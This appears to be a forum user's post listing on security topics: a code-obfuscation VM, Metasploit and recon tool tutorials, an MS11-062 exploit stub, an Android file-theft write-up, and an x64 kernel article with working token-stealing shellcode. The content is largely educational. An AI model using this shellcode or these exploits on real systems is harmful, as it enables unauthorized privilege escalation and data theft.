

Everything posted by Nytro

  1. Recuva File Recovery Accidentally deleted an important file? Lost something important when your computer crashed? No problem! Recuva recovers files deleted from your Windows computer, Recycle Bin, digital camera card, or MP3 player. And it's free! v1.41.537 (10 Oct 2011) - Added content searching for specific text in deleted files. - Added regular expression matching to the filter. - Added preliminary support for Windows 8. - Improved support for BartPE (added new folder creation). - Fixed filter drop down highlight issue. - Improved recovery of compressed files from drives with non-standard cluster size. - Many minor UI improvements. - Latvian language added. Download: http://www.piriform.com/recuva/download
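  2. [C++] Simple Code Virtualization (Virtual Machine / Emulator) Original code by: abhe Ported by: steve10120 at ic0de.org Thanks to Edi for help with inst_table Original: ic0de.org
/*
  Original code by: abhe
  Ported by: steve10120@ic0de.org
  Thanks to Edi for help with inst_table
*/
#include <Windows.h>
#include <iostream>

/*
  Toy bytecode interpreter: eight 32-bit guest registers named after the x86
  set, a guest stack in a GlobalAlloc'd buffer, and a one-byte opcode that
  indexes inst_table.  Guest EIP and ESP hold raw host addresses.

  Review notes (defensive):
   - This is an obfuscation demo, not a sandbox.  The *Mem handlers read and
     write whatever host address the bytecode names, and VJmp sets EIP to an
     arbitrary host address, so only trusted bytecode may be run.
   - Handlers fetch operand bytes without checking that they lie inside the
     [Code, Code + Size) window that ExecuteVM enforces for opcode bytes; a
     truncated final instruction reads past the buffer.
   - Pointers are stored in DWORD registers, so the design is 32-bit only; the
     typedef below refuses to compile where a pointer does not fit a DWORD
     (the original silently truncated the pointer and then dereferenced it).
*/
typedef char vm_requires_32bit_pointers[sizeof(void*) == sizeof(DWORD) ? 1 : -1];

int const REGISTER_EAX = 0;
int const REGISTER_ECX = 1;
int const REGISTER_EDX = 2;
int const REGISTER_EBX = 3;
int const REGISTER_ESP = 4;
int const REGISTER_EBP = 5;
int const REGISTER_ESI = 6;
int const REGISTER_EDI = 7;
int const REGISTER_NOP = 8;    /* kept from the original; not referenced below */
int const REGISTER_COUNT = 8;  /* upper bound for operand register indices */

typedef struct _VMCONTEXT {
    DWORD EIP;     /* host address of the next guest opcode byte */
    DWORD Reg[8];  /* guest registers, indexed by REGISTER_* */
} VMCONTEXT, *PVMCONTEXT;

typedef void (VM_FUNCTION_CALL)(PVMCONTEXT c);

typedef struct _INST {
    VM_FUNCTION_CALL* FunctionCall;
} INST, *PINST;

/* Advance the guest instruction pointer past n operand bytes. */
void AddCode(PVMCONTEXT c, BYTE n)
{
    c->EIP += n;
}

/* ---- operand decoding ---------------------------------------------------
   Each Fetch* helper is entered with EIP on the opcode byte and leaves it on
   the byte after the last operand, exactly like the hand-expanded originals.
   The bool result says whether every register index is in range; callers only
   touch VM state when it is true, which preserves the original "if (reg < 8)"
   behaviour (an out-of-range register is skipped, not faulted). */

static bool FetchReg(PVMCONTEXT c, BYTE* reg)
{
    c->EIP++;
    *reg = *(PBYTE)c->EIP;
    AddCode(c, 1);
    return *reg < REGISTER_COUNT;
}

static bool FetchRegReg(PVMCONTEXT c, BYTE* dest, BYTE* src)
{
    c->EIP++;
    *dest = *(PBYTE)c->EIP;
    AddCode(c, 1);
    *src = *(PBYTE)c->EIP;
    AddCode(c, 1);
    return (*dest < REGISTER_COUNT) && (*src < REGISTER_COUNT);
}

/* "reg, imm32"; also used for "reg, [mem32]", where imm32 is the host address. */
static bool FetchRegImm(PVMCONTEXT c, BYTE* dest, DWORD* imm32)
{
    c->EIP++;
    *dest = *(PBYTE)c->EIP;
    AddCode(c, 1);
    *imm32 = *(PDWORD)c->EIP;
    AddCode(c, 4);
    return *dest < REGISTER_COUNT;
}

/* Bare imm32 operand (no register byte). */
static DWORD FetchImm(PVMCONTEXT c)
{
    DWORD imm32;
    c->EIP++;
    imm32 = *(PDWORD)c->EIP;
    AddCode(c, 4);
    return imm32;
}

/* ---- guest stack --------------------------------------------------------
   The stack grows upward: ESP points at the first free slot.  Push stores and
   then advances, so Pop must step back before loading.  The original
   VPOPReg/VPOPMem loaded from ESP first and decremented afterwards, which read
   the empty slot above the last pushed value instead of the value itself.
   Neither direction checks the 2 MiB buffer bounds; the handlers do not know
   the base address. */

static void PushValue(PVMCONTEXT c, DWORD value)
{
    *(PDWORD)c->Reg[REGISTER_ESP] = value;
    c->Reg[REGISTER_ESP] += 4;
}

static DWORD PopValue(PVMCONTEXT c)
{
    c->Reg[REGISTER_ESP] -= 4;
    return *(PDWORD)c->Reg[REGISTER_ESP];
}

/* ---- instruction handlers (opcode = inst_table index) ------------------- */

/* 0x00 retn: no state change; ExecuteVM stops when it has run opcode 0. */
void VRetn(PVMCONTEXT c)
{
    (void)c;
}

/* 0x01 jmp imm32: imm32 is an absolute host address. */
void VJmp(PVMCONTEXT c)
{
    c->EIP = FetchImm(c);
}

/* 0x02 push imm32 */
void VPUSHImm(PVMCONTEXT c)
{
    PushValue(c, FetchImm(c));
}

/* 0x03 push reg */
void VPUSHReg(PVMCONTEXT c)
{
    BYTE reg;
    if (FetchReg(c, &reg))
        PushValue(c, c->Reg[reg]);
}

/* 0x04 push [mem32] */
void VPUSHMem(PVMCONTEXT c)
{
    DWORD mem32 = FetchImm(c);
    PushValue(c, *(PDWORD)mem32);
}

/* 0x05 pop reg */
void VPOPReg(PVMCONTEXT c)
{
    BYTE reg;
    if (FetchReg(c, &reg))
        c->Reg[reg] = PopValue(c);
}

/* 0x06 pop [mem32].  The original never stepped past the opcode byte, so it
   decoded the address from EIP+0..3 (opcode included) and left EIP one byte
   short; the address is now taken from EIP+1..4 like every other imm32. */
void VPOPMem(PVMCONTEXT c)
{
    DWORD mem32 = FetchImm(c);
    *(PDWORD)mem32 = PopValue(c);
}

/* 0x07 mov reg, reg */
void VMovRegReg(PVMCONTEXT c)
{
    BYTE dest, src;
    if (FetchRegReg(c, &dest, &src))
        c->Reg[dest] = c->Reg[src];
}

/* 0x08 mov reg, imm32 */
void VMovRegImm(PVMCONTEXT c)
{
    BYTE dest;
    DWORD imm32;
    if (FetchRegImm(c, &dest, &imm32))
        c->Reg[dest] = imm32;
}

/* 0x09 mov reg, [mem32] */
void VMovRegMem(PVMCONTEXT c)
{
    BYTE dest;
    DWORD mem32;
    if (FetchRegImm(c, &dest, &mem32))
        c->Reg[dest] = *(PDWORD)mem32;
}

/* 0x0A add reg, reg */
void VADDRegReg(PVMCONTEXT c)
{
    BYTE dest, src;
    if (FetchRegReg(c, &dest, &src))
        c->Reg[dest] += c->Reg[src];
}

/* 0x0B add reg, imm32 */
void VADDRegImm(PVMCONTEXT c)
{
    BYTE dest;
    DWORD imm32;
    if (FetchRegImm(c, &dest, &imm32))
        c->Reg[dest] += imm32;
}

/* 0x0C add reg, [mem32] */
void VADDRegMem(PVMCONTEXT c)
{
    BYTE dest;
    DWORD mem32;
    if (FetchRegImm(c, &dest, &mem32))
        c->Reg[dest] += *(PDWORD)mem32;
}

/* 0x0D sub reg, reg */
void VSUBRegReg(PVMCONTEXT c)
{
    BYTE dest, src;
    if (FetchRegReg(c, &dest, &src))
        c->Reg[dest] -= c->Reg[src];
}

/* 0x0E sub reg, imm32 */
void VSUBRegImm(PVMCONTEXT c)
{
    BYTE dest;
    DWORD imm32;
    if (FetchRegImm(c, &dest, &imm32))
        c->Reg[dest] -= imm32;
}

/* 0x0F sub reg, [mem32] */
void VSUBRegMem(PVMCONTEXT c)
{
    BYTE dest;
    DWORD mem32;
    if (FetchRegImm(c, &dest, &mem32))
        c->Reg[dest] -= *(PDWORD)mem32;
}

/* 0x10 mul reg: EAX *= reg (32-bit wrap-around product, nothing goes to EDX). */
void VMulEaxReg(PVMCONTEXT c)
{
    BYTE src;
    if (FetchReg(c, &src))
        c->Reg[REGISTER_EAX] *= c->Reg[src];
}

/* 0x11 div reg: EAX = EAX / reg.
   The original computed EAX /= reg followed by EAX %= reg, which left the
   remainder *of the quotient* in EAX and lost the quotient.  A zero divisor is
   skipped (registers unchanged) because the VM has no fault path.  The
   remainder is still discarded; producing it in EDX would be an ISA change,
   not a fix, so it is left to the author. */
void VDivEaxReg(PVMCONTEXT c)
{
    BYTE src;
    if (FetchReg(c, &src) && c->Reg[src] != 0)
        c->Reg[REGISTER_EAX] /= c->Reg[src];
}

/* 0x12 and reg, reg */
void VANDRegReg(PVMCONTEXT c)
{
    BYTE dest, src;
    if (FetchRegReg(c, &dest, &src))
        c->Reg[dest] &= c->Reg[src];
}

/* 0x13 and reg, imm32 */
void VAndRegImm(PVMCONTEXT c)
{
    BYTE dest;
    DWORD imm32;
    if (FetchRegImm(c, &dest, &imm32))
        c->Reg[dest] &= imm32;
}

/* and reg, [mem32] -- defined but not present in inst_table (see there). */
void VAndRegMem(PVMCONTEXT c)
{
    BYTE dest;
    DWORD mem32;
    if (FetchRegImm(c, &dest, &mem32))
        c->Reg[dest] &= *(PDWORD)mem32;
}

/* 0x14 or reg, reg (the original tested the range with a bitwise '&'; the
   result was the same for these bools, '&&' is the intended form). */
void VORRegReg(PVMCONTEXT c)
{
    BYTE dest, src;
    if (FetchRegReg(c, &dest, &src))
        c->Reg[dest] |= c->Reg[src];
}

/* 0x15 or reg, imm32 */
void VORRegImm(PVMCONTEXT c)
{
    BYTE dest;
    DWORD imm32;
    if (FetchRegImm(c, &dest, &imm32))
        c->Reg[dest] |= imm32;
}

/* 0x16 or reg, [mem32] */
void VORRegMem(PVMCONTEXT c)
{
    BYTE dest;
    DWORD mem32;
    if (FetchRegImm(c, &dest, &mem32))
        c->Reg[dest] |= *(PDWORD)mem32;
}

/* Opcode -> handler; the index is the opcode byte.  VAndRegMem has no slot,
   so "and reg, [mem32]" cannot be encoded; inserting it would renumber the
   OR opcodes and break existing bytecode, so the table is left as found. */
const INST inst_table[23] = {
    {VRetn},      {VJmp},       {VPUSHImm},   {VPUSHReg},   {VPUSHMem},
    {VPOPReg},    {VPOPMem},    {VMovRegReg}, {VMovRegImm}, {VMovRegMem},
    {VADDRegReg}, {VADDRegImm}, {VADDRegMem}, {VSUBRegReg}, {VSUBRegImm},
    {VSUBRegMem}, {VMulEaxReg}, {VDivEaxReg}, {VANDRegReg}, {VAndRegImm},
    {VORRegReg},  {VORRegImm},  {VORRegMem}
};
DWORD const INST_TABLE_SIZE = sizeof(inst_table) / sizeof(inst_table[0]);

/*
  Interpret Size bytes of bytecode starting at Code and return the final
  register state.

  Code, Size : host buffer holding the bytecode.
  Returns    : the VMCONTEXT after the run.  If the 2 MiB stack buffer cannot
               be allocated, a zero-initialised context is returned.  (The
               original zeroed Reg[0..6] only, leaving EDI -- and EIP on the
               failure path -- indeterminate.)

  Execution stops when opcode 0 (retn) has run, when EIP leaves the code window
  (for example after a VJmp; the original only checked the upper bound, so a
  jump below Code kept interpreting host bytes), or when an opcode has no
  inst_table entry.  That last check replaces an unchecked inst_table[Op]
  index that, for Op > 22, dispatched through whatever memory follows the table.
*/
VMCONTEXT ExecuteVM(LPVOID Code, DWORD Size)
{
    VMCONTEXT Context = {0};
    DWORD const CodeStart = (DWORD)Code;
    DWORD const CodeEnd = CodeStart + Size;   /* one past the last opcode byte */

    LPVOID Stack = GlobalAlloc(GMEM_FIXED, 1024 * 1024 * 2);
    if (!Stack)
        return Context;

    Context.Reg[REGISTER_ESP] = (DWORD)Stack;
    Context.EIP = CodeStart;

    while (Context.EIP >= CodeStart && Context.EIP < CodeEnd) {
        BYTE Op = *(PBYTE)Context.EIP;
        if (Op >= INST_TABLE_SIZE)
            break;
        inst_table[Op].FunctionCall(&Context);
        if (Op == 0)
            break;
    }

    GlobalFree(Stack);
    return Context;
}

int main(void)
{
    BYTE Code[13] = {
        0x08, 0x00, 0x05, 0x00, 0x00, 0x00,   /* mov eax, 5 */
        0x0B, 0x00, 0x05, 0x00, 0x00, 0x00,   /* add eax, 5 */
        0x00                                  /* retn */
    };
    VMCONTEXT Context = ExecuteVM(Code, sizeof(Code));
    std::cout << Context.Reg[REGISTER_EAX] << std::endl;
    return 0;
}
Sursa: ic0de.org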
  3. Building small exe in VC++ 2010 li0n.coder hi all this is my first post at this amazing forum in this tutorial i will guide you step by step to make smallest possible native win32 application by using Visual C++ 2010 Express the reason for this tutorial is that VS 6.0 is very old but most people still use it because it makes small native exe also most projects were made by VS 6.0 so it is hard for some to convert it to the new edition of VS 1- download and install Visual C++ 2010 Express (free) 2- File>New>project 3- choose win32 project , let us name it smallexe, then press ok 4- new windows will pop up, click next 5- check empty project then click finish 6- go to project>add new item>c++ file> let us name it main , then press ok 7- paste this code which show simple message box #include <windows.h> int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { MessageBoxA(NULL,"my small exe!","info",0); return 0; } 8- now go to project>properties 9- press configuration manger and set active solution configuration to "release" then close 10- [optional step] many codes around will generate errors when you build it , simply because they were written in VS 6.0 and they don't support Unicode, if you don't know how to convert the project to Unicode we can disable this feature configuration properties>character set>change to "not set" 11- go to C/C++>optimization>optimization>choose minimize size 12- go to C/C++>code generation>run time library>choose multi threaded dll (/MT) why ? this option will Remove dependency of msvcr100.dll which is not available natively on windows xp 13-go to linker>manifest file>generate manifest>choose no 14-go to linker>debugging>generate debug info>choose no 15-go to linker>advanced>entry point> write WinMain 16- build the project yaaaay 2.5kb app, that run without any dependency !! 
when you write bigger project use minicrt.lib[download from attachments], it also will decrease the size linker>input>additional dependencies> write minicrt.lib; hope it works with you guys Sursa: ic0de.org
  4. Microsoft Windows NDISTAPI Local Privilege Escalation Vulnerability (MS11-062)
/*
 * Public proof-of-concept for the NDISTAPI issue addressed by MS11-062 (see
 * the title and the source links below).  Defensive note: remediation is the
 * MS11-062 update; the listing is reproduced here for reference only.
 */
#include "stdio.h"
#include "windows.h"

#define NTSTATUS int

int main(int argc, char* argv[])
{
    /* Most of these locals are declared but never used in this listing. */
    PULONG pShellcode;
    char InputBuffer[4]={0};
    ULONG AllocationSize,dwReturnSize;
    HANDLE dev_handle;
    SC_HANDLE hscmHandle = NULL;
    SC_HANDLE hscDriver = NULL;
    PROCESS_INFORMATION pi;
    STARTUPINFOA stStartup;

    printf("\n Microsoft Ndistapi.sys Local Privilege Escalation Vulnerability Exploit \n\n");

    dev_handle = CreateFile("\\\\.\\NDISTAPI" ,GENERIC_READ | GENERIC_WRITE ,0,NULL,CREATE_ALWAYS ,0,0);

    DeviceIoControl( dev_handle, 0x8fff23d4, InputBuffer,4,(PVOID)0x80000000,0,&dwReturnSize, NULL);

    return 1;
}
Via: http://www.softrce.net/archives/405 Sursa: http://www.ic0de.org/showthread.php?10860-SRC-Microsoft-Windows-NDISTAPI-Local-Privilege-Escalation-Vulnerability-%28MS11-062%29
  5. Nessus With Metasploit Tutorial- Backtrack 5 Video Tutorial Nessus is the best vulnerability scanner, management and assessment tool, and Metasploit is the best database, software, program and tool for exploits. Each is the best in its domain, but when we connect them to each other they become even more capable; in short, we make the best penetration testing tool for exploiting an operating system by using Nessus with Metasploit. However, there are different ways to do so, and we have shared different methods and tutorials to integrate Metasploit with Nessus or vice versa. In this article we will discuss a video tutorial in which I will show you the power of Nessus and Metasploit. This tutorial is a little different from the other tutorials that have been discussed before about Nessus, Metasploit, Nmap and Nexpose. Here is a list of some of those tutorials, and then I will show you how this tutorial differs from them. Metasploit Autopwn With Nessus Backtrack 5 Tutorial Integrate Nessus With Metasploit- Tutorial Nessus Setup On Backtrack 5 Metasploit Remote Desktop Exploit-Backtrack 5 Below is the tutorial in which I will show some advanced features of Nessus, like the Filter feature to find the exploits that are publicly available, and by using Metasploit I will show you how to exploit a computer or a vulnerability that has been found by Nessus. Video: http://www.youtube.com/watch?feature=player_embedded&v=2zBqnHrUWDU#! Sursa: Nessus With Metasploit Tutorial- Backtrack 5 Video Tutorial | Ethical Hacking-Your Way To The World Of IT Security
  6. Dnsmap - DNS Network Mapper Information is very important for performing penetration testing; as a very first step, ethical hackers/penetration testers try to get the maximum information about the target. The steps required for information gathering or footprinting have been discussed in an earlier article; click here to read it. There are also some automatic tools that gather this information and help map the victim network by using its official websites. In this article we will cover DNSMAP. Dnsmap is a passive network mapper, normally known as a subdomain brute forcer. It was originally released in 2006 and is used by pentesters during the information gathering/enumeration phase of infrastructure security assessments. Dnsmap is open source and tested on Linux-based operating systems, although it can be used on FreeBSD and the Windows platform by using Cygwin; dnsmap was included in Backtrack 2, 3 and 4. Key Features IPv6 support Makefile included delay option (-d) added. This is useful in cases where dnsmap is killing your bandwidth ignore IPs option (-i) added. This allows ignoring user-supplied IPs from the results. 
Useful for domains which cause dnsmap to produce false positives changes made to make dnsmap compatible with OpenDNS disclosure of internal IP addresses (RFC 1918) are reported updated built-in wordlist included a standalone three-letter acronym (TLA) subdomains wordlist domains susceptible to “same site” scripting are reported completion time is now displayed to the user mechanism to attempt to bruteforce wildcard-enabled domains unique filename containing timestamp is now created when no specific output filename is supplied by user various minor bugs fixed DNSMAP Tutorial After downloading extract it now open terminal and go on the place where you have extract dnsmap and follow these steps: Type gcc dnsmap.c -o dnsmap or g++ dnsmap.c -o dnsmap make sure you have installed C compiler After this make it executable type chmod +x dnsmap And than run it by typing ./dnsmap domain.com $ dnsmap baidu.com dnsmap 0.22 - DNS Network Mapper by pagvac (gnucitizen.org) [+] searching (sub)domains for baidu.com using built-in wordlist accounts.baidu.com IP address #1: 10.11.252.74 events.baidu.com IP address #1: 202.108.23.40 finance.baidu.com IP address #1: 60.28.250.196 Download: http://dnsmap.googlecode.com/files/dnsmap-0.30.tar.gz Sursa: http://www.ehacking.net/2011/02/dnsmap-dns-network-mapper.html
  7. Maltego- Information Gathering Tool Tutorial This article is linked with our series of articles on footprinting (information gathering); for the previous story click here. Now, besides the whois, nslookup and tracert commands, there are some tools available on the market to perform footprinting professionally; these tools provide a wide range of options and techniques to perform valuable footprinting. In this article we will talk about Maltego. Maltego is an open source forensic application that is used to gather maximum information for the purposes of forensics and pen testing, and it can represent a result in a very formal and easy-to-understand format. It is available in two flavours: one is the community edition and the other is the commercial version. You can download Maltego for your Windows-based operating system and for Linux-based operating systems. Click here to grab your copy. This is the top and main navigation bar; there are two tabs, one is the investigate tab and the other is the manage tab. Now we are on the manage tab, where we can see different entities and transforms, but the point of consideration is the Palette option: turn it on. The Palette option is the main option from which you drag your main task; for example, if you want to gather information about a person, then drag the person option and enter the name of the person about whom you are going to gather information. After that, right click on the person and, supposing we have to find the email addresses of a related person, in the email option click all in the set and your scan will begin. Output depends on your computer's processing speed and your internet speed. Now we have found the related email addresses. Is this enough? No, there are more amazing options present in Maltego; for example, you can gather information about DNS servers. For this purpose see the video demonstration of Maltego. Video: http://www.youtube.com/watch?v=QMypTK-dVaI&feature=player_embedded#! 
Sursa: Maltego- Information Gathering Tool Tutorial | Ethical Hacking-Your Way To The World Of IT Security
  8. Android Data Stealing with Metasploit by creatures November 15, 2011 This vulnerability was found by Thomas Cannon back in 2010, I think. I just thought this is interesting to share to Android users . I tried this exploit on Marvell tablets with Android versions 1.6 – 2.2. The big one is using 1.6 and small is using 2.2. For some reason this tablet has been customize by a private company which is used for a project. Screenshot1: http://www.theprojectxblog.net/wp-content/uploads/2011/11/319-1024x768.jpg Firing up metasploit then using android_htmlfileprovider Screenshot2: http://www.theprojectxblog.net/wp-content/uploads/2011/11/305-1024x768.jpg Screenshot3: http://www.theprojectxblog.net/wp-content/uploads/2011/11/300-768x1024.jpg When the user accesses the malicious url that we have setup, consequences are the attacker will able to get any data including any sensitive data from/proc, browser files such as history,bookmarks and maybe even sessions. Also you can grab data from sdcards, As explained by Thomas Cannon in his blog: The Android browser doesn’t prompt the user when downloading a file, for example"payload.html", it automatically downloads to /sdcard/download/payload.html It is possible, using JavaScript, to get this payload to automatically open, causing the browser to render the local file. When opening an HTML file within this local context, the Android browser will run JavaScript without prompting the user. While in this local context, the JavaScript is able to read the contents of files (and other data). Screenshot4: http://www.theprojectxblog.net/wp-content/uploads/2011/11/293-1024x768.jpg Majority are now using Android Phones and Tablets especially here in PHL. Google should not be the only one who needs to fix this but also other companies producing or manufacturing Android Phones and Tablets with same version but most companies that I know just dont give a damn about fixing and updating, etc. 
PS: I also tried it on android 2.3 Archos and the exploit doesnt work Take care guys and be aware Sursa: http://www.theprojectxblog.net/android-data-stealing-with-metasploit/
  9. TU -> Server 1 -> ... -> Server n -> Victima Victima -> Server n -> ... -> Server 1 -> TU Asa cum datele ajung la tine, indiferent prin cate "filtre" trec, asa poate oricine sa ajunga la tine, ca si datele, pas cu pas... Cat despre moda asta cu "spartul" site-urilor mi se pare o prostie. Insa cea mai mare prostie e ca dupa ce te caci, il mai iei si la palme. Adica dupa ce ca faci ceva ce nu e permis de lege (acces neautorizat), te mai si lauzi la toata lumea ca tu "1337"-le ai fost.
  10. Sunt niste porcarii. Videoclipurile nu explica nimic, sunt "demonstrative" (nici asta nu stiu daca ar fi corect sa spun) iar acel articol parca e scris de un pusti care a folosit 2 cryptere si poate se crede zmeu. Una era sa explice cobein, Karcrack, steve (daca nu erau ei si inca cativa cu idei geniale nu existau acum atatea cryptere, desi ideile originale sunt ale lui Matt Pietrek cu multi, multi ani in urma) sau alte persoane care cel putin stiu care e structura unui executabil, alta e sa explice acel personaj care nu este altceva decat un utilizator casnic...
  11. x64 Kernel Privilege Escalation March 7, 2011 Caution: Mucking around in the kernel like this carries a high risk of causing the Blue Screen of Death (BSOD) and possible data loss. Testing in a virtual machine or other non-production system is highly recommended. Introduction The user account and access privileges associated with a running Windows process are determined by a kernel object called a token. The kernel data structures that keep track of various process-specific data contain a pointer to the process’s token. When the process attempts to perform various actions, such as opening a file, the account rights and privileges in the token are compared to the privileges required, to determine if access should be granted or denied. Because the token pointer is simply data in kernel memory, it is a trivial matter for code executing in kernel mode to change it to point to a different token and therefore grant the process a different set of privileges. This underscores the importance of securing the system against vulnerabilities that can be exploited by local users to execute code in the kernel. This article will provide an explanation and sample exploit code for elevating a process to Administrator-level privileges. Modified versions of the device driver and test program from my device driver development article will be used as a means of injecting executable code into the kernel. Details For a walk-through we will start up a command prompt (cmd.exe) with standard user privileges, and then use the kernel debugger to manually locate the token of the highly privileged System process and give the running cmd.exe process System-level privileges. First, find the hexadecimal address of the System process: kd> !process 0 0 System PROCESS fffffa8003cf11d0 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000 DirBase: 00187000 ObjectTable: fffff8a0000018b0 HandleCount: 687. 
Image: System This points to an _EPROCESS structure with many fields which we can dump as follows: kd> dt _EPROCESS fffffa8003cf11d0 nt!_EPROCESS +0x000 Pcb : _KPROCESS +0x160 ProcessLock : _EX_PUSH_LOCK +0x168 CreateTime : _LARGE_INTEGER 0x1cbdcf1`54a2bf4a +0x170 ExitTime : _LARGE_INTEGER 0x0 +0x178 RundownProtect : _EX_RUNDOWN_REF +0x180 UniqueProcessId : 0x00000000`00000004 Void +0x188 ActiveProcessLinks : _LIST_ENTRY [ 0xfffffa80`05b3c828 - 0xfffff800`02e71b30 ] +0x198 ProcessQuotaUsage : [2] 0 +0x1a8 ProcessQuotaPeak : [2] 0 +0x1b8 CommitCharge : 0x1e +0x1c0 QuotaBlock : 0xfffff800`02e50a80 _EPROCESS_QUOTA_BLOCK +0x1c8 CpuQuotaBlock : (null) +0x1d0 PeakVirtualSize : 0xf70000 +0x1d8 VirtualSize : 0x870000 +0x1e0 SessionProcessLinks : _LIST_ENTRY [ 0x00000000`00000000 - 0x0 ] +0x1f0 DebugPort : (null) +0x1f8 ExceptionPortData : (null) +0x1f8 ExceptionPortValue : 0 +0x1f8 ExceptionPortState : 0y000 +0x200 ObjectTable : 0xfffff8a0`000018b0 _HANDLE_TABLE +0x208 Token : _EX_FAST_REF +0x210 WorkingSetPage : 0 [...] The token is a pointer-sized value located at offset 0x208 and we can dump the value as follows: kd> dq fffffa8003cf11d0+208 L1 fffffa80`03cf13d8 fffff8a0`00004c5c You may have noticed in the _EPROCESS structure that the Token field is declared as an _EX_FAST_REF, rather than the expected _TOKEN structure. The _EX_FAST_REF structure is a trick that relies on the assumption that kernel data structures are required to be aligned in memory on a 16-byte boundary. This means that a pointer to a token or any other kernel object will always have the last 4 bits set to zero (in hex the last digit will always be zero). Windows therefore feels free to use the low 4 bits of the pointer value for something else (in this case a reference count that can be used for internal optimization purposes). 
kd> dt _EX_FAST_REF nt!_EX_FAST_REF +0x000 Object : Ptr64 Void +0x000 RefCnt : Pos 0, 4 Bits +0x000 Value : Uint8B To get the actual pointer from an _EX_FAST_REF, simply change the last hex digit to zero. To accomplish this programmatically, mask off the lowest 4 bits of the value with a logical-AND operation. kd> ? fffff8a0`00004c5c & ffffffff`fffffff0 Evaluate expression: -8108898235312 = fffff8a0`00004c50 We can display the token with dt _TOKEN or get a nicer display with the !token extension command: kd> !token fffff8a0`00004c50 _TOKEN fffff8a000004c50 TS Session ID: 0 User: S-1-5-18 Groups: 00 S-1-5-32-544 Attributes - Default Enabled Owner 01 S-1-1-0 Attributes - Mandatory Default Enabled 02 S-1-5-11 Attributes - Mandatory Default Enabled 03 S-1-16-16384 Attributes - GroupIntegrity GroupIntegrityEnabled Primary Group: S-1-5-18 Privs: 02 0x000000002 SeCreateTokenPrivilege Attributes - 03 0x000000003 SeAssignPrimaryTokenPrivilege Attributes - 04 0x000000004 SeLockMemoryPrivilege Attributes - Enabled Default [...] Note that the Security Identifier (SID) with value S-1-5-18 is the built-in SID for the Local System account (see the well-known SIDs reference from Microsoft). The next step is to locate the _EPROCESS structure for the cmd.exe process and replace the Token pointer at offset 0x208 with the address of the System token: kd> !process 0 0 cmd.exe PROCESS fffffa80068ea060 SessionId: 1 Cid: 0d0c Peb: 7fffffdf000 ParentCid: 094c DirBase: 1f512000 ObjectTable: fffff8a00b8b5a10 HandleCount: 18. Image: cmd.exe kd> eq fffffa80068ea060+208 fffff8a000004c50 Finally, go to the command prompt and use the built-in whoami command to display the user account. You can also confirm by running commands or accessing files that you know should require Administrator privileges. Exploit Code Implementing the above procedure in code is short and sweet, with only minor differences for x64 as compared to the x86 privilege escalation codes that have been around for years. 
I disassembled the nt!PsGetCurrentProcess function to see how to get the _EPROCESS address of the current process. The _EPROCESS structures of all running processes on the system are linked together in a circular doubly-linked list using the ActiveProcessLinks member. We can locate the System process by following these links and looking for process ID 4. ;priv.asm ;grant SYSTEM account privileges to calling process [BITS 64] start: ; db 0cch ;uncomment to debug mov rdx, [gs:188h] ;get _ETHREAD pointer from KPCR mov r8, [rdx+70h] ;_EPROCESS (see PsGetCurrentProcess function) mov r9, [r8+188h] ;ActiveProcessLinks list head mov rcx, [r9] ;follow link to first process in list find_system_proc: mov rdx, [rcx-8] ;offset from ActiveProcessLinks to UniqueProcessId cmp rdx, 4 ;process with ID 4 is System process jz found_it mov rcx, [rcx] ;follow _LIST_ENTRY Flink pointer cmp rcx, r9 ;see if back at list head jnz find_system_proc db 0cch ;(int 3) process #4 not found, should never happen found_it: mov rax, [rcx+80h] ;offset from ActiveProcessLinks to Token and al, 0f0h ;clear low 4 bits of _EX_FAST_REF structure mov [r8+208h], rax ;replace current process token with system token ret I’m using the Netwide Assembler (NASM) in Cygwin to assemble the code (native win32 NASM binaries are also available). Build with: nasm priv.asm This will generate a raw binary output file called priv (with no file extension). Note that NASM generates the two-byte opcode 0xCD 0x03 for the int 3 instruction rather than the standard one-byte 0xCC debugger breakpoint. This causes problems in the kernel debugger because it assumes that the next instruction is only one byte ahead in memory, not two bytes. This can be worked around if necessary by manually adjusting the RIP register by one byte after the breakpoint hits, but it’s better to just generate the correct opcode in the first place with db 0cch. 
Testing My device driver development article presents a sample device driver which accepts a string from a user-mode process via a Device I/O Control interface, and simply prints the string to the kernel debugger. To test the above exploit code, I modified the driver to execute the passed-in data as code instead: void (*func)(); //execute code in buffer func = (void(*)())buf; func(); This of course requires that the memory page be marked executable, otherwise Data Execution Prevention (DEP) would trigger an exception. I was actually surprised that the buffer passed into an IOCTL interface (using METHOD_DIRECT) was executable by default. I’m not sure if this will always be the case, and I believe it has to do with the use of large pages in kernel memory on x64 systems, which make memory protections impractical (memory can only be set as non-executable at the granularity of the virtual memory page size). I then modified the user-mode test program to use the following function to read the data from the priv binary file rather than passing in a hard-coded string: //allocates buffer and reads entire file //returns NULL on error //stores length to bytes_read if non-NULL char *read_file_data(char *filename, int *bytes_read) { char *buf; int fd, len; fd = _open(filename, _O_RDONLY | _O_BINARY); if (-1 == fd) { perror("Error opening file"); return NULL; } len = _filelength(fd); if (-1 == len) { perror("Error getting file size"); return NULL; } buf = malloc(len); if (NULL == buf) { perror("Error allocating memory"); return NULL; } if (len != _read(fd, buf, len)) { perror("error reading from file"); return NULL; } _close(fd); if (bytes_read != NULL) { *bytes_read = len; } return buf; } Finally, I also modified the test program to launch a command prompt in a separate process after executing the exploit code via the driver: //launch command prompt (cmd.exe) as new process void run_cmd() { STARTUPINFO si; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, 
sizeof(pi)); si.cb = sizeof(si); if (!CreateProcess(L"c:\\windows\\system32\\cmd.exe", NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) { debug("error spawning cmd.exe"); } else { printf("launched cmd.exe with process id %d\n", pi.dwProcessId); } } The new command prompt process inherits the token of the test program process, which has been elevated to the System token. Sursa: http://mcdermottcybersecurity.com/articles/x64-kernel-privilege-escalation
